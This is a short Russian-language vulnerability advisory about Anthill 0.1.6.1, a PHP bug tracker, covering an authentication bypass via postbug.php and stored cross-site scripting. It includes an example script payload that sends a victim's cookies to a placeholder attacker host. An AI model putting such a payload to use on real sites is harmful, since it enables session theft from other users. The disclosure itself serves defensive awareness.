Anthill — система отслеживания ошибок (bug tracking) написанная
на PHP. 

1.Anthill содержит компонент postbug.php, который используется для обработки ошибок и добавления их в базу данных. При добавлении ошибки пользователи проходят аутентификацию в сценарии enterbug.php, который затем передает информацию для обработки к postbug.php. Поскольку
postbug не требует никакой идентификации, нападающий может передавать команды непосредственно к postbug.php (через URL или, создавая соответствующую форму на удаленном Web-сервере), таким образом
обходится механизм авторизации в enterbug.php.

2. Anthill не санирует пользовательский ввод, позволяя авторизованному
человеку вставлять произвольный HTML или JavaScript код при публикации ошибки. Этот код будет выполнен в браузерах других пользователей 
при просмотре  страницы с опубликованной
ошибкой. 

Поскольку Anthill использует cookies для подтверждения подлинности пользователей, уязвимость может использоваться для перехвата опознавательных мандатов других пользователей.

Пример:

<script>self.location.href=»http://www.evilsite.com/evil?&_gclid=5b0962a36d3589.36596612-5b0962a36d35c7.56749869&_utm_source=xakep&_utm_campaign=mention5005&_utm_medium=inline&_utm_content=lnk4198894700″+escape(document
cookie)</script>

Уязвимость обнаружена в Anthill 0.1.6.1.

Оставить мнение